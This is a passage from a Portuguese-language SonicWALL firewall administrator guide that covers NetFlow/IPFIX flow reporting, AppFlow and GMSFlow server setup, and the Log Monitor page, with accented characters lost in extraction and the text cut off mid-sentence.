Etapa 6 Em Configuraes de relatrios de conexo e Reportar conexes, marque a caixa de seleo
Baseado em interface. Uma vez habilitada, os fluxos reportados baseiam-se na interface do
iniciador ou respondente. Observe que esta etapa opcional.
Baseado em regras de firewall/aplicativo. Uma vez habilitada, os fluxos reportados
baseiam-se em regras de firewall j existentes. Observe que esta etapa opcional, mas
obrigatria se os relatrios de fluxo forem realizados em interfaces selecionadas.
Procedimentos de configurao do Netflow verso 9

Para configurar relatrios de fluxo do Netflow verso 9, siga as etapas listadas a seguir.

Etapa 2 Selecione Netflow verso-9 como o Formato do relatrio de fluxo externo na lista
suspensa.
opcional.
2055.
Etapa 8 Observe que o Netflow verso-9 usa modelos que precisam ser conhecidos por um coletor
externo antes de enviar dados. Em Configuraes do coletor externo e Aes, clique no boto
Gerar TODOS os modelos para comear a gerar modelos.
Procedimentos de configurao de IPFIX (NetFlow verso 10)

Para configurar os relatrios de fluxo de IPFIX ou NetFlow verso 10, siga as etapas listadas
a seguir.
Etapa 2 Selecione IPFIX como o Formato do relatrio de fluxo externo na lista suspensa.
opcional.
2055.
Etapa 8 Observe que o IPFIX usa modelos que precisam ser conhecidos por um coletor externo
antes de enviar dados. Em Configuraes do coletor externo e Aes, clique no boto
Gerar TODOS os modelos para comear a gerar modelos.

Procedimentos de configurao de IPFIX com extenses
Para configurar relatrios de fluxo de IPFIX com extenses, siga as etapas listadas a seguir.
Etapa 2 Selecione IPFIX com extenses como o Formato do relatrio de fluxo externo na lista
suspensa.
se o coletor externo tiver de ser acessado por um tnel VPN.
2055.
Etapa 8 Observe que o IPFIX usa modelos que precisam ser conhecidos por um coletor externo antes
de enviar dados. Clique no boto Gerar TODOS os modelos para comear a gerar modelos.
Etapa 9 Habilite a opo para Enviar fluxos estticos em intervalos regulares marcando a caixa de
seleo. Aps habilitar esta opo, clique no boto Gerar fluxos estticos.
Etapa 10 Selecione as tabelas para as quais voc deseja receber fluxos estticos na lista suspensa
Enviar AppFlow esttico para as tabelas seguintes.
Etapa 11 Selecione as tabelas para as quais voc deseja receber fluxos dinmicos na lista suspensa
Enviar AppFlow dinmico para as tabelas seguintes.

Etapa 12 Selecione quaisquer relatrios adicionais a gerar para um fluxo na lista suspensa Incluir os
relatrios adicionais seguintes por IPFIX.
Configurar NetFlow com extenses com o SonicWALL Scrutinizer

Uma opo de relatrios de fluxo externo que funciona com o NetFlow com extenses o
coletor de terceiros denominado SonicWALL Scrutinizer. Este coletor exibe uma faixa de
relatrios e anlises que detecta o fluxo de NetFlow e SonicWALL.
Para verificar suas configuraes de relatrios do Netflow com extenses, execute as etapas
a seguir.
Etapa 1 Nas pginas Configuraes do painel de visualizao e Coletor a usar para Monitor de
AppFlow, marque a caixa de seleo Servidor AppFlow.
Etapa 2 Em Configuraes do servidor AppFlow, marque a caixa de seleo Enviar AppFlow para o
servidor AppFlow da SonicWALL para permitir que os fluxos sejam reportados para um
coletor de fluxo externo.
Etapa 4 Selecione IPFIX com extenses como o Formato do relatrio de fluxo externo na lista
suspensa.
se o coletor externo tiver de ser acessado por um tnel VPN.
2055.
Etapa 10 Selecione as tabelas para as quais voc deseja receber fluxos estticos na lista suspensa
fornecida. Em seguida, clique em Aceitar.
.

Nota Atualmente, o Scrutinizer suporta somente aplicativos e ameaas. Verses futuras da Plixer
suportaro os seguintes fluxos estticos: Mapa de localizao, servios, mapa de
classificao, mapa de tabelas e mapa de colunas.
Etapa 11 Em seguida, navegue at a tela Rede > Interfaces.

Etapa 12 Confirme se a opo Relatrios de fluxo est habilitada conforme a interface clicando no cone
Configurar da interface qual est requisitando dados.
Etapa 13 Na guia Avanado, marque a caixa de seleo Habilitar relatrios de fluxo. Em seguida,
clique em OK.
Etapa 14 Faa login no SonicWALL Scrutinizer. Os dados so exibidos dentro de alguns minutos.
Tabelas do NetFlow
A seo a seguir descreve as diferentes tabelas do NetFlow. Alm disso, essa seo descreve
detalhadamente as tabelas de IPFIX com extenses que so exportadas quando o SonicWALL
est configurado para reportar fluxos.
Tabelas estticas na pgina 1293
Tabelas dinmicas na pgina 1294
Modelos na pgina 1295
NetFlow verso 5 na pgina 1295
NetFlow verso 9 na pgina 1296
IPFIX (NetFlow verso 10) na pgina 1297
IPFIX com extenses na pgina 1297
Tabelas estticas
As tabelas estticas so tabelas com dados que no se alteram com o passar do tempo. No
entanto, esses dados so necessrios para correlacionar com outras tabelas. As tabelas
estticas so normalmente reportadas em um intervalo especificado, mas tambm podem ser
configuradas para enviar apenas uma vez. A seguir encontra-se uma lista de tabelas de IPFIX
estticas que podem ser exportadas:
Mapa de aplicativos Esta tabela mostra todos os aplicativos que o firewall identifica,
incluindo vrios atributos, IDs de assinatura, IDs de aplicativos, nomes de categorias e IDs
de categorias.
Mapa de vrus Esta tabela mostra todos os vrus detectados pelo firewall.
Mapa de spyware Esta tabela mostra todo o spyware detectado pelo firewall.
Mapa de intruses Esta tabela mostra todas as intruses detectadas pelo firewall.
Mapa do local Esta tabela representa o mapa do local da SonicWALL que descreve a lista
de pases e regies com suas IDs.

Mapa de servios Esta tabela representa a lista de servios da SonicWALL com nmeros
de porta, tipo de protocolos, intervalo de nmeros de porta e nomes.
Mapa de classificao Esta tabela representa a lista da SonicWALL de IDs de
classificao e o nome do tipo de classificao.
Mapa de layout de tabelas Esta tabela mostra a lista de tabelas da SonicWALL para
exportar, incluindo a ID da tabela e os nomes da tabela.
Mapa de coluna Esta tabela representa a lista de colunas da SonicWALL a reportar com
nome, tipo, tamanho e equivalentes padro de IPFIX para cada coluna de cada tabela.
Tabelas dinmicas
Ao contrrio das tabelas estticas, os dados das tabelas dinmicas mudam com o passar do
tempo e so enviados repetidamente, com base na atividade do firewall. As colunas destas
tabelas aumentam com o tempo, exceo de algumas tabelas que contm relatrios de
estatsticas ou de utilizao. A seguir encontra-se uma lista de tabelas dinmicas de IPFIX que
podem ser exportadas:
Conexes Esta tabela mostra conexes da SonicWALL. As tabelas com o mesmo fluxo
podem ser reportadas vrias vezes configurando acionadores.
Usurios Esta tabela mostra usurios fazendo login no firewall atravs de LDAP/
RADIUS, local ou SSO.
URLs Esta tabela mostra URLs acessadas atravs do firewall.
Classificaes de URL Esta tabela mostra IDs de classificao para todas as URLs
acessadas atravs do firewall.
VPNs Esta tabela mostra todos os tneis VPN estabelecidos atravs do firewall.
Dispositivos Esta tabela mostra a lista de todos os dispositivos conectados atravs do
firewall, incluindo endereos MAC, endereos IP, interface e nome NETBIOS de
dispositivos conectados.
SPAMs Esta tabela mostra todas as trocas de e-mail atravs do servio SPAM.
Locais Esta tabela mostra os locais e os nomes de domnio de um endereo IP.
VoIPs Esta tabela mostra todas as chamadas VoIP/H323 atravs do firewall.

Modelos
A seguinte seo mostra exemplos do tipo de tabelas de modelo de Netflow que so
exportadas. Voc pode realizar um relatrio de diagnstico de sua configurao de Netflow
navegando at a tela Sistema > Diagnstico e clicando no boto Baixar relatrio na seo
"Relatrio do suporte tcnico".
NetFlow verso 5
O datagrama do NetFlow verso 5 consiste em um cabealho e um ou mais registros de fluxo
usando UDP para enviar datagramas de exportao. O primeiro campo do cabealho contm
o nmero da verso do datagrama de exportao. O segundo campo no cabealho contm o
nmero de registros no datagrama, o qual poder ser usado para pesquisar nos registros. Uma
vez que o NetFlow verso 5 um datagrama fixo, no esto disponveis modelos e este
seguir o formato das tabelas listadas abaixo.
Formato do cabealho do Netflow verso 5
Bytes Contedos Descrio

0-1 verso Nmero da verso do formato de exportao do NetFlow
2-3 contagem Nmero de fluxos exportados neste pacote (130)
4-7 SysUptime Tempo atual em milissegundos desde a reinicializao do dispositivo de
exportao
8-11 unix_secs Contagem atual de segundos desde 0000 UTC 1970
12-15 unix_nsecs Nanossegundos residuais desde 0000 UTC 1970
16-19 flow_sequence Contador de sequncia de fluxos totais vistos
20 engine_type Tipo de mecanismo de comutao de fluxo
20 engine_id Nmero de slots do mecanismo de comutao de fluxo
22-23 sampling_interval Os primeiro dois bits mantm o modo de amostragem; os restantes 14
bits mantm o valor do intervalo de amostragem

Formato de registro de fluxo do Netflow verso 5
Bytes Contedos Descrio

0-3 srcaddr Endereo IP de origem
4-7 dstaddr Endereo IP de destino
8-11 nexthop Endereo IP do roteador next hop
12-13 input ndice de SNMP de interface de entrada
14-15 output ndice de SNMP de interface de sada
10-19 dPkts Pacotes no fluxo
20-23 dOctets Nmero total de bytes de camada 3 nos pacotes do fluxo
24-27 Primeiro SysUptime no incio do fluxo
28-31 ltimo SysUptime no momento em que o ltimo pacote do fluxo foi
recebido
32-33 srcport Nmero da porta de origem de TCP/UDP ou equivalente
34-35 dstport Nmero da porta de destino de TCP/UDP ou equivalente
36 pad1 Bytes no usados (zero)
37 tcp_flags OR cumulativo de sinalizadores TCP
38 prot Tipo de protocolo IP (por exemplo, TCP=6; UDP=17)
39 tos Tipo IP de servio (ToS)
40-41 src_as Nmero de sistema autnomo da origem, quer seja origem quer
seja par
42-43 dst_as Nmero de sistema autnomo do destino, quer seja origem quer
seja par
44 src_mask Bits de mscara do prefixo do endereo de origem
45 dst_mask Bits de mscara do prefixo do endereo de destino
46-47 pad2 Bytes no usados (zero)
NetFlow verso 9
Um exemplo de um modelo do NetFlow verso 9 exibido abaixo.

A tabela a seguir detalha as descries do campo de FlowSet do modelo do NetFlow verso 9.
Nome do campo Descrio

ID do modelo O firewall gera modelos com uma ID exclusiva com base nos modelos de
FlowSet que correspondem ao tipo de dados do NetFlow que est sendo
exportado.
Nome O nome do modelo do NetFlow.
Nmero de elementos A quantidade de campos listados no modelo do NetFlow.
Tamanho total O tamanho total em bytes de todos os campos reportados no modelo do
NetFlow.
Tipo de campo O tipo de campo um valor numrico que representa o tipo de campo. Note
que os valores do tipo de campo podem ser especficos do fornecedor.
Bytes de campo O comprimento do tipo de campo especfico, em bytes.
IPFIX (NetFlow verso 10)

Um exemplo de um modelo de IPFIX (NetFlow verso 10).
A tabela a seguir detalha as descries do campo de FlowSet do modelo de IPFIX.
Nome do campo Descrio

ID do modelo O firewall gera modelos com uma ID exclusiva com base nos modelos de
FlowSet que correspondem ao tipo de dados do NetFlow que est sendo
exportado.
Nome O nome do modelo do NetFlow.
Nmero de elementos A quantidade de campos listados no modelo do NetFlow.
Tamanho total O tamanho total em bytes de todos os campos reportados no modelo do
NetFlow.
Tipo de campo O tipo de campo um valor numrico que representa o tipo de campo. Note
que os valores do tipo de campo podem ser especficos do fornecedor.
Bytes de campo O comprimento do tipo de campo especfico, em bytes.
IPFIX com extenses

O IPFIX com extenses exporta modelos que so uma combinao de campos de NetFlow das
verses referidas acima e IDs da SonicWALL. Esses fluxos contm vrias extenses, como
tipos de campos definidos por Enterprise e IDs de Enterprise. Observe que a ID de Enterprise
especfica da SonicWALL (EntID) definida como 8741.

O seguinte modelo de nome um padro para os modelos IPFIX com extenses. Os valores
especificados so estticos e correlacionam-se com o nome da tabela de todos os modelos
exportveis do NetFlow.
O seguinte modelo um exemplo de um modelo de IPFIX com extenses.

AppFlow > Servidor GMSFlow
A pgina AppFlow > Servidor GMSFlow permite que voc estabelea uma conexo com um
servidor GMSFlow.
No Dell SonicWALL Global Management System (GMS), a funo Servidor Flow pode ser
usada em uma implantao distribuda do GMS. Nessa funo, o servidor GMS executa um
servio nico, o qual coleta fluxos Dell SonicWALL nas portas-padro.
O servio nico que executado nesta funo o Dell SonicWALL Universal Management
Suite Servidor Flow. Os fluxos so coletados e armazenados em bancos de dados internos.
Para ser capaz de criar relatrios fora desses fluxos, voc precisa ter um servidor GMS
implantado executando a verso 7.1 ou posterior e definido com a funo de Console ou
Multifuncional. Voc tambm precisar certificar-se de que as seguintes portas estejam
abertas:
UDP 2055
UDP 5055
TCP 9063
TCP 9064
TCP 9065
TCP 9066
TCP 9067
Para estabelecer uma conexo com um servidor GMSFlow:
Etapa 1 No GMS, efetue login no servidor Instant GMSFlow.

Etapa 2 Navegue at a pgina Rede > Configuraes.
Etapa 3 Localize e copie do endereo IP do host do servidor GMSFlow.

No dispositivo de segurana de rede SonicWALL:
Etapa 4 V para a pgina AppFlow > Servidor GMSFlow.
Etapa 5 Na caixa Endereo do servidor GMSFlow, cole o endereo IP do host.

Etapa 6 Na caixa IP de origem para usar para o coletor em um tnel VPN,
especifique o endereo IP de origem da poltica de VPN aplicvel.
Etapa 7 Na caixa Tempo limite de comunicao do servidor, insira o nmero de segundos que o
firewall esperar para receber uma resposta do servidor Flow. O intervalo de 60 a 180
segundos.
Etapa 8 Se voc desejar habilitar o firewall para enviar fluxos estticos para servidor Flow cada vez que
o firewall seja reinicializado, selecione a opo Sincronizao automtica do servidor Flow.
Etapa 9 Para testar a conexo com o servidor GMSFlow, clique no boto Testar conectividade.
Etapa 10 Se voc desejar enviar dados estticos para o servidor GMSFlow manualmente, clique no
boto Sincronizar servidor.
Nota Voc deve clicar no boto Sincronizar servidor somente uma vez, depois de realizar a
conexo a e registrar o seu produto GMS SonicWALL.
Para obter mais informaes detalhadas sobre a configurao de um servidor AppFlow com
GMS, consulte o Guia do administrador do GMS Dell SonicWALL mais recente, disponvel em:
http://www.sonicwall.com/support.html

AppFlow > Servidor AppFlow
Esta seo descreve como configurar um servidor AppFlow da SonicWALL como um coletor
externo de relatrios e anlises de dados AppFlow e em tempo real. Os administradores de
rede podem configurar um servidor AppFlow central para suportar vrios firewalls.

Definir configuraes do servidor AppFlow na pgina 1302
Verificar a configurao do servidor AppFlow na pgina 1302

Definir configuraes do servidor AppFlow
Para configurar um servidor AppFlow, execute as seguintes etapas:
Etapa 1 Navegue at a pgina AppFlow > Servidor AppFlow. Para recuperar automaticamente
atualizaes de status no servidor AppFlow, marque a caixa de seleo Habilitar Keep Alive
com servidor AppFlow.
Etapa 2 No campo Endereo do servidor AppFlow, digite o endereo IP.
Etapa 3 No campo IP de origem para usar no tnel VPN, digite o endereo IP que pode ser acessado
por meio de um tnel VPN.
Etapa 4 No campo Fluxos mximos do servidor AppFlow, insira o nmero mximo de fluxos
armazenados em um nico arquivo de banco de dados.
Etapa 5 No campo Tempo limite de comunicao do servidor, insira o nmero de segundos a
aguardar para receber uma resposta do servidor AppFlow relativamente a dados do monitor
de AppFlow. O intervalo aceito encontra-se entre 60 e 180 segundos.
Etapa 6 Digite o nome do seu firewall. Este nome deve ser exclusivo se mais do que um dispositivo de
firewall for usado com um nico servidor AppFlow.
Etapa 7 No campo Cdigo de acesso de conexo, digite a senha do servidor AppFlow para responder
ao firewall.
Etapa 8 Marque a caixa de seleo Sincronizao automtica do servidor AppFlow. Isso habilitar
o firewall para enviar fluxos estticos para o servidor AppFlow sempre que o firewall for
reinicializado.
Etapa 9 Clique no boto Testar conectividade. Isto inicia uma transmisso de pacote de saudao no
servidor AppFlow. Se o servidor AppFlow responder, ser exibida a mensagem de status em
verde "Ativo". Se o firewall estiver registrado em mysonicwall.com, ser exibida a mensagem
de status em verde "Registrado". tambm exibido um carimbo de hora relativamente ltima
vez que o firewall enviou um pacote de saudao e recebeu de novo um pacote de saudao
confirmado do servidor AppFlow.
Etapa 10 Clique no boto Sincronizar servidor. O firewall iniciar o envio de fluxos estticos para o
servidor AppFlow.
Etapa 11 Na seo Descoberta de servidor, o boto Iniciar descoberta exibe todos os servidores
AppFlow diretamente conectados ao seu dispositivo de firewall. Na coluna Ao, clique no
boto Selecionar para preencher automaticamente as informaes de configuraes e
endereo IP do servidor AppFlow como o servidor AppFlow selecionado para o seu dispositivo
de firewall. Os botes Liberar tudo e Liberar limpam a lista de descoberta.
Verificar a configurao do servidor AppFlow

Verifique se o firewall est usando os dados do servidor AppFlow navegando at as pginas
Monitor de AppFlow ou Monitor em tempo real. Na parte superior da pgina, junto seleo
Origem de dados, o boto de opo Servidor AppFlow est selecionado e voc pode selecionar
no menu suspenso Banco de dados de fluxo os arquivos de fluxo do banco de dados
disponveis para exibio.

Implantar um servidor AppFlow de coletor externo
Esta seo descreve a instalao, o login de vrios administradores e a configurao de um
servidor AppFlow externo para suportar relatrios de unidades de agregao e individuais para
vrios firewalls.
Adicionar um dispositivo para coleta de banco de dados do servidor AppFlow

Para adicionar um dispositivo de firewall, execute as seguintes etapas:
Etapa 1 Navegue at a pgina AppFlow > Dispositivos. Clique no boto Adicionar dispositivo. A
janela pop-up Adicionar dispositivo ser exibida.
Etapa 2 Insira as seguintes informaes para o seu dispositivo de firewall:

Nmero de srie: <00:17c5:72:g3:55>
Nome: Insira um nome amigvel para seu firewall.
Fluxos mximos no BD: Selecione entre 5000 e 1.000.000 fluxos.
Etapa 3 Para excluir arquivos de banco de dados, clique no cone de edio na coluna Ao. Insira a
contagem de arquivos nos arquivos de banco de dados excludos do respectivo firewall e clique
no boto Aplicar.
Etapa 4 Para remover um dispositivo, clique no cone de remoo na coluna Ao. exibida uma caixa
de dilogo de aviso pop-up para verificar se voc deseja remover o dispositivo selecionado da
lista de dispositivos gerenciados. Clique no boto OK para remover o dispositivo.

Visualizar os monitores de AppFlow a partir de um servidor
AppFlow
Os monitores de painel/AppFlow que podem ser acessados a partir da pgina Painel ou da
pgina AppFlow tambm podem ser acessados e visualizados a partir de um servidor
AppFlow.
Voc pode visualizar os seguintes monitores de AppFlow/painel a partir de um servidor
AppFlow:
Monitor em tempo real
Trao AppFlow
Monitor de AppFlow
Relatrios AppFlow
No menu Dispositivos de AppFlow, voc pode adicionar um dispositivo para ser monitorado.
Depois de adicionar dispositivos, voc pode escolher qualquer um desses dispositivos na lista
de dispositivos na tabela.

Para adicionar um dispositivo pgina Dispositivos de servidor AppFlow:
Etapa 1 Clique no boto Adicionar dispositivo.

A caixa de dilogo Adicionar dispositivo ser exibida.
Etapa 2 Na caixa Nmero de srie, digite o nmero de srie do dispositivo que deseja adicionar.
Etapa 3 Na caixa Nome, digite um nome para o seu dispositivo.
Etapa 4 No menu Fluxos mximos no BD, selecione o valor que desejar.
Os valores selecionveis encontram-se entre 5000 e 1.000.000.
Cada dispositivo na tabela Dispositivos possui quatro cones nos quais voc pode clicar para
iniciar o monitor em tempo real, o trao AppFlow, o monitor de AppFlow ou os relatrios de
AppFlow.
No canto superior esquerdo exibido o menu de seleo de bem-vindo(a), status, verso,

nmero de srie, tipo e dispositivo.
Para mostrar dados de coleta externos em qualquer um dos monitores:

No menu Dispositivo, selecione o dispositivo desejado.

Os trs grficos a seguir mostram os grficos de Monitor em tempo real medida que
aparecem no servidor AppFlow. Os dois primeiros monitores na parte superior da pgina
Monitor em tempo real so Taxa de conexo e Contagem de conexes.

medida voc rola para baixo na pgina Monitor em tempo real, poder ver os monitores
Taxa de pacote e Tamanho de pacote.

Rolando mais para baixo, voc pode ver o monitor Aplicativos e o monitor Largura de banda.

Trao AppFlow
A pgina Trao AppFlow, conforme visualizada a partir do servidor AppFlow, exibe as mesmas
tabelas tal como so visualizadas na pgina Painel ou na pgina AppFlow.

Monitor de AppFlow
A pgina Monitor de AppFlow, conforme visualizada a partir do servidor AppFlow, exibe a

mesma tabela tal como visualizada na pgina Painel ou na pgina AppFlow.
A pgina Monitor de AppFlow possui guias que permitem ver e monitorar os seguintes tipos
de itens em tabelas separadas:
Aplicativos
Usurios
IP
Vrus
Intruses
Spyware
Local
Classificao de URL
Os seguintes botes e menus funcionais encontram-se na linha diretamente abaixo da linha de

guias:
Boto Viso de filtro Selecione um item na tabela e clique neste boto para filtrar a
visualizao da tabela de acordo com a sua seleo.
Menu Intervalo Selecione o intervalo de atualizao neste menu.
Menu Grupo Selecione o grupo para mostrar na tabela neste menu.
Menu Limite Selecione o nmero de entradas para mostrar na tabela.

Boto Exibio de tabela Clique para exibir no formato de tabela.
Boto Grfico de pizza Clique para exibir no formato de grfico de pizza.
Boto Exportar Clique para exportar os relatrios para um dispositivo externo.
Boto Imprimir Clique para imprimir.
Boto Ferramentas Clique para selecionar colunas a serem exibidas.
Boto Atualizar Clique para atualizar a tela.
Relatrios AppFlow
A pgina Relatrios AppFlow possui as mesmas guias, botes e menus semelhantes aos da
pgina Monitor de AppFlow.

A pgina Relatrios AppFlow permite selecionar dois pontos no grfico ao longo do eixo de
tempo, para que voc possa ampliar um perodo de tempo especfico. Quando voc clica no
boto Atualizar, a tela mostra um grfico somente para aquele perodo de tempo.
Em Ver, no menu Sesses no lado direito do grfico, voc poder selecionar mais
visualizaes granulares.
AppFlow > Monitor em tempo real

Nota Para maior convenincia e acessibilidade, a pgina Monitor em tempo real pode ser
acessada a partir de Painel > Monitor em tempo real ou AppFlow > Monitor em tempo
real. A pgina idntica, independentemente da guia atravs da qual acessada. Para
obter informaes sobre a utilizao do Monitor em tempo real, consulte Painel > Monitor
em tempo real na pgina 53.

AppFlow > Trao AppFlow
Nota Para maior convenincia e acessibilidade, a pgina Monitor de AppFlow pode ser acessada
a partir de Painel > Trao AppFlow ou AppFlow > Trao AppFlow. A pgina idntica,
independentemente da guia atravs da qual acessada. Para obter informaes sobre
como usar o Monitor de AppFlow, consulte Painel > Trao AppFlow na pgina 63.
AppFlow > Monitor de AppFlow

Nota Para maior convenincia e acessibilidade, a pgina Monitor de AppFlow pode ser acessada
a partir de Painel > Monitor de AppFlow ou AppFlow > Monitor de AppFlow. A pgina
idntica, independentemente da guia atravs da qual acessada. Para obter informaes
sobre como usar o Monitor de AppFlow, consulte Painel > Monitor AppFlow na pgina 64.
AppFlow > Relatrios AppFlow

Nota Para maior convenincia e acessibilidade, a pgina Relatrios AppFlow pode ser acessada
a partir de Painel > Relatrios AppFlow ou AppFlow > Relatrios AppFlow. A pgina
idntica, independentemente da guia atravs da qual acessada. Para obter informaes
sobre a utilizao de relatrios AppFlow, consulte Painel > Relatrios AppFlow na
pgina 75.

Parte 21
Registrar
| 1315
Captulo 73
Gerenciando eventos de log
Log > Monitoramento de log

O dispositivo de segurana de rede Dell SonicWALL mantm um log de eventos para rastrear
possveis ameaas de segurana. Este log pode ser exibido na pgina Log > Monitor de log
ou na pgina Painel > Monitor de log. As duas pginas tm funcionalidades idnticas.
O log de eventos pode ser enviado automaticamente para um Endereo de e-mail para
convenincia e arquivamento. Os alertas do Monitor de log tambm podem ser enviados por
e-mail e podem alert-lo sobre problemas como ataques ao seu firewall. Os alertas so
imediatamente enviados por e-mail para um endereo de e-mail ou para um pager de e-mail.
Cada entrada do log contm a data e a hora do evento e uma breve mensagem que descreve
o evento.
Gerenciando eventos de log | 1317

As informaes apresentadas so controladas pela definio de opes para as categorias
que voc deseja exibir na tabela de logs. Use a coluna Categorias para determinar os eventos
da linha de base que sero monitorados e para configurar informaes especficas de eventos.
A caixa de entrada Filtro localizada no canto superior esquerdo do painel Monitor de log
permite que voc digite uma cadeia de caracteres de pesquisa usada para filtrar os eventos de
log que so exibidos no painel Monitor de log.
possvel digitar qualquer subcadeia e pressionar a tecla Enter para filtrar painel Monitor de
log. O Monitor de log listar somente os eventos de log que contenham correspondncias para
essa subcadeia.
Configurar Registro em log/Exibir Registro em log

No canto superior direito da pgina Monitor de log, o boto Configurar Registro em log pode
ser clicado para alternar para a pgina Configuraes de log, onde possvel configurar as
definies para os eventos de log. Quando estiver na pgina Configuraes de log, o boto
Exibir Registro em log pode ser clicado para alternar para a pgina Monitor de log.
No canto inferior direito da pgina Monitor de log, a hora e a data da ltima atualizao do
Monitor de log so exibidas.
Gerenciamento dos eventos de log

Algumas das tarefas mais comuns que voc pode executar para gerenciar o Log de eventos so
as seguintes:
Exibio on-line de Eventos de log O Log de eventos no persistente. Os eventos mais
antigos no buffer do banco de dados do Log de eventos no tempo de execuo podem ser
substitudos por eventos mais recentes.
Exibio on-line usando a UI do Monitor de log do SonicOS A UI tira instantneos do
banco de dados do Log de eventos para que os usurios possam rolar para a frente e para trs
no Log de eventos usando o seu navegador.
Formato de exibio de texto usando a CLI Mostra somente o contedo atual do banco de
dados do Log de eventos.
Filtragem da exibio do Monitor de log possvel personalizar a exibio do Log de
eventos.
Filtragem da captura da Configurao de log possvel personalizar a captura do Log de
eventos.
Exibio off-line dos Eventos de log A exibio off-line persistente porque o sistema salva
os eventos de log em uma fonte externa, como o seu computador.
Exibindo Eventos de log por e-mail Usando o cliente de e-mail, possvel configurar
Alertas individuais por e-mail que so enviados sempre que ocorre um evento ou um Resumo
de e-mail que envia lotes de eventos de log periodicamente.

Exibindo Eventos de log por meio do Visualizador do Syslog possvel exibir e configurar
os eventos de log e as definies de captura usando um visualizador do Syslog.
Exibindo Eventos de log por meio do GMS Syslogs possvel exibir e configurar os eventos
de log usando o GMS.
Exportando o banco de dados do Log de eventos possvel exportar o banco de dados do
Log de eventos como um arquivo de texto sem formatao clicando no boto Exportar.
Excluindo entradas do banco de dados do Log de eventos do tempo de execuo

possvel excluir as entradas permanentemente usando o boto Limpar tudo. Assim, realize
este procedimento com cautela. Se a automao no estiver habilitada, exporte o banco de
dados antes de usar Limpar tudo.
Investigao profunda de pacotes usando um Registrador de dados, como o Solera

possvel registrar eventos profundos de pacotes usando um registrador de dados, como o
Solera. Este recurso habilitado em Log > Automao e os eventos que sero registrados
so configurados em Log > Configuraes.

Funes da tabela do Monitor de log
A tabela Monitor de log fornece inmeras configuraes para permitir que voc acesse, exiba
e exporte resultados. As colunas da tabela podem ser personalizadas para que voc possa
exibir os dados completos sobre qualquer evento ou apenas os dados dos quais voc precisa.
As entradas da tabela podem ser classificadas em ordem ascendente ou descendente.
possvel classificar as entradas na tabela Monitor de log clicando no cabealho da coluna.
As entradas so classificadas por ordem crescente ou decrescente. A seta para a direita da
entrada da coluna indica o status de classificao. Uma seta para baixo significa ordem
crescente. Uma seta para cima indica uma ordem decrescente.
A linha superior da tabela Monitor de log contm vrios itens funcionais:
Menu Eventos de log desde

Botes funcionais
Caixa Atualizar
Menu Eventos de log desde

No menu Eventos de log desde, possvel selecionar o intervalo de tempo da exibio dos
eventos de log. Os intervalos de tempo vo desde os ltimos 30 minutos at os ltimos 30 dias
ou todos os eventos de log contidos no banco de dados.

Botes funcionais
Os botes funcionais executam vrias funes do Monitor de log. Pausar o cursor sobre um
boto exibir a descrio do boto.
A tabela a seguir descreve as funes dos botes:
Boto Funo Descrio

Exportar log como arquivo CSV Clicar neste boto exibe uma caixa de dilogo que
permite abrir ou salvar o log no formato de valores
separados por vrgula (CSV). Este formato usado para
importar no Excel ou outros aplicativos de
desenvolvimento de apresentao.
Exportar log como arquivo de Clicar neste boto exibe uma caixa de dilogo que
texto sem formatao permite salvar o log no formato de texto sem formatao.
Dois formatos de e-mail podem ser configurados na
pgina Log > Automao: Texto sem formatao ou
HTML.
Selecionar colunas a serem Clicar neste boto exibe uma caixa de dilogo que
exibidas permite selecionar as colunas que voc deseja mostrar
na tabela Monitor de log.
Forar atualizao Clicar neste boto atualiza as informaes na tabela
Monitor de log.
Enviar log para endereo de e- Clicar neste boto envia todos os logs para o endereo
mail de e-mail configurado.
Limpar todos os logs Clicar neste boto exclui todos os logs salvos.
Status Clicar neste boto exibe o nmero total de logs

existentes no banco de dados, bem como a ltima hora
reportada para cada categoria de status.
Caixa Atualizar
Na extrema direita da tabela, na caixa Atualizar, possvel especificar a frequncia com que
a tabela Monitor de log atualizada com os eventos do banco de dados do log de eventos.
O padro atualizar a cada 60 segundos, mas possvel especificar outros intervalos. Para
atualizar todas as sadas imediatamente, clique no boto de alternncia pausar/reproduzir
localizado direita da caixa Atualizar.
O boto de alternncia pausar/reproduzir inicia ou para a atualizao de contedo da tabela

Monitor de log. Isto til nos casos em que a tabela Monitor de log est muito ocupada e
est sendo atualizada de forma contnua em uma sucesso rpida. Os usurios podem pausar
a tela para impedir uma atualizao longa para inspecionar as mensagens.

O Monitor de log exibido em uma tabela e pode ser classificado por coluna.
Para selecionar quais colunas voc deseja que sejam exibidas na tabela:
Etapa 1 Clique no boto Ferramentas.
A caixa de dilogo Selecionar colunas a serem exibidas exibida.
Etapa 2 Na caixa de dilogo Selecionar colunas a serem exibidas, selecione as colunas que voc
deseja exibir.

As colunas da tabela de log padro incluem:
Hora A data e a hora do evento.
ID O nmero de identificao do evento. O ID mais til ao usar o GMS ou o Syslog. O
ID mostrado nos pacotes do Syslog e usado para identificar dados em relatrios
gerados.
Categoria Para facilitar a localizao e definio das configuraes de um evento, os
eventos podem ser exibidos por Categoria, Grupo ou Evento, selecionados na caixa de
dilogo Selecionar colunas a serem exibidas.
Prioridade O nvel de prioridade associado ao seu evento de log. O Syslog usa oito
prioridades para caracterizar as mensagens: Emergncia, Alerta, Crtico, Erro,
Advertncia, Aviso, Informativa e Depurao.
Endereo Int Exibe o endereo IP e a rede de origem.
Dst. Int Exibe o endereo IP e a rede de destino.
Endereo IP Exibe o endereo IP de origem.
Endereo Porta Exibe a porta de origem.
Dst. IP Exibe o endereo IP de destino.
Dst. Porta Exibe a porta de destino.
Protocolo do IP O protocolo do IP (TCP ou IP) sendo usado
Nome de usurio Exibe o nome do usurio de origem
Aplicativo Exibe o aplicativo que acessa a rede.
Notas Fornece informaes dinmicas e detalhadas sobre o evento.
Mensagem Fornece uma descrio geral do evento.
Nota As colunas Hora, ID e Mensagem so sempre exibidas e no podem ser ocultas

por personalizao.
Nota Para obter mais informaes sobre eventos de log especficos, consulte o Guia de
Referncia dos Eventos de log do SonicOS.

Filtrando a tabela Monitor de log
A barra de filtros permite filtrar a tabela de log com base em critrios selecionados.
Etapa 1 Selecione um item de filtro clicando na clula da coluna desejada. A clula selecionada fica
azul. Vrias clulas podem ser selecionadas.
Etapa 2 Ao terminar de fazer as selees, clique em + na barra de filtros.

O critrio de filtro aplicado exibio e possvel visualizar o tipo de filtro na barra de filtros.

Etapa 3 Clique na seta ao lado do nome da coluna (neste caso, Categoria), para exibir o valor do
filtro.
Etapa 4 Para remover um filtro, clique no X ao lado do tipo de filtro.

Viso do filtro
A Exibio de filtros permite que voc defina a filtragem sem correspondncias existentes na
tabela Monitor de log. No modo normal, s possvel definir a filtragem com base em um
